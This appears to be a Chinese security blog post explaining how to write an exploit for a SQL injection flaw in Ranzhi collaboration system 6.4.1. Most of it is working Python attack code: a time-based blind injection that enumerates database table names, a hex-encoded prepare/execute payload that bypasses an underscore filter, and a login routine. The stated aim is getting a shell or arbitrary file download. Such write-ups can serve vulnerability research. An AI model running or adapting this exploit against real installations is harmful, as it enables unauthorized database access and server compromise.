然之协同系统6.4.1 SQL注入之exp编写

前言

前面已经说明了 漏洞成因，这里介绍一下 exp 的编写。

正文

为了 getshell 或者是 任意文件下载， 我们需要修改 数据库中的 前缀sys_file 表， 所以我们的利用方式如下

• 使用 sql 注入 获取程序数据库中任何一个表名, 取得前缀 pre
• 然后向 presys_file 中插入目标路径。

在 mysql 5 中可以使用 information_schema  来获取指定数据库中的表。

在  information_schema   中的 tables 表里面存放着整个 mysql 里面保存的表的信息， table_schema 为 表所在的数据库， table_name 为表名。

所以使用

SELECT table_name FROM information_schema.tables where table_schema=database()

就可以得到 当前数据库的 所有表的表名（database() 返回当前的数据库名称）。

由于没有回显，需要使用一些 条件判断 相关的函数，这里我使用 if

select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,1 ,1))=16, SLEEP(3), 1)

if 的第一参数为 1 则返回第二个参数的值，否则返回 第3个参数的值.

上面的语句用到了子查询和 acsii， substr 来对检索到的结果根据其 ascii 值进行枚举，如果枚举到了，就 sleep(3)。

我们可以通过判断服务器的响应时间，来判断当前枚举位的具体值。

同时子查询只允许返回一行，所以使用 了 limit 0,1 来只返回第一条结果。

枚举表名的关键代码如下

    table_name = ""
    for i in range(1, table_len + 1):
        for j in range(1, 129):
            payload = get_payload_encode(
                '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                    i, j))

            start = time.time()
            requests.get(host)
            nor_time = (time.time() - start)

            start = time.time()
            requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
            att_time = (time.time() - start)
            if att_time - nor_time > 2:
                table_name += chr(j)
                print(table_name)
                break

还有一个注意的就是，程序过滤了 _, 这里使用 prepare 和 execute 组合进行绕过，因为 mysql 支持字符串使用 16 进制编码输入。

def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str---> byte   用 encode

最后的 exp:

# coding=utf-8
import requests
import base64
import time
import json
import binascii
import re
import hashlib
import chardet


def get_md5(input):
    input = input.encode("utf-8")
    m = hashlib.md5()
    m.update(input)
    return m.hexdigest()

def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str---> byte   用 encode


# get_db_name(host)


def get_table_name(host):
    path = "/cash/block-printTradeBlock.html?param="
    target = host + path
    # 查表名
    table_len = 0
    for i in range(1, 100):
        payload = get_payload_encode(
            '''select if((SELECT LENGTH(table_name)FROM information_schema.tables where table_schema=database() LIMIT 0,1)={}, SLEEP(3), 1);'''.format(
                i))
        start = time.time()
        requests.get(host)
        nor_time = (time.time() - start)

        start = time.time()
        requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
        att_time = (time.time() - start)

        if att_time - nor_time > 2:
            table_len = i
            break


    print("db_len: %d" %(table_len))

    table_name = ""
    for i in range(1, table_len + 1):
        for j in range(1, 129):
            payload = get_payload_encode(
                '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                    i, j))

            start = time.time()
            requests.get(host)
            nor_time = (time.time() - start)

            start = time.time()
            requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
            att_time = (time.time() - start)
            if att_time - nor_time > 2:
                table_name += chr(j)
                print(table_name)
                break


def login(url, username , password):
    target = url + "/sys/user-login.html"
    data = {"account": "admin", "password": "d4dba0bc2f7e946feaeacbdcdc167131",
                  "referer": "http://hack.ranzhi.top/sys/index.html", "rawPassword": "21232f297a57a5a743894a0e4a801fc3",
                  "keepLogin": "false"}

    res = requests.get(target, headers=headers)
    cookies['rid'] = res.cookies['rid']
    random = re.findall('v.random = "(.*?)";', res.text)[0]

    # 生成登录需要的数据
    data['account'] = username
    data['referer'] = target
    data['rawPassword'] = get_md5(password)
    data['password'] = get_md5(get_md5(get_md5(password) + username) + random)

    res = requests.post(target, headers=headers, cookies=cookies, data=data)
    if "self.location" in res.content.decode("utf-8"):
        print("登录成功，下面开始 exploit")
    else:
        print("登录失败")
        exit(0)


if __name__ == '__main__':
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", }

    cookies = {"lang": "zh-cn", "theme": "default", "keepLogin": "false", "rid": "6n6panbh36uqiqj4k5o0nbscq2",
               " XDEBUG_SESSION": "19857"}
    headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
               "Referer": "http://hack.ranzhi.top/sys/index.php", "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

    host = "http://hack.ranzhi.top:80/"
    # get_table_name(host)

    login(host, "test", "111111")
    get_table_name(host)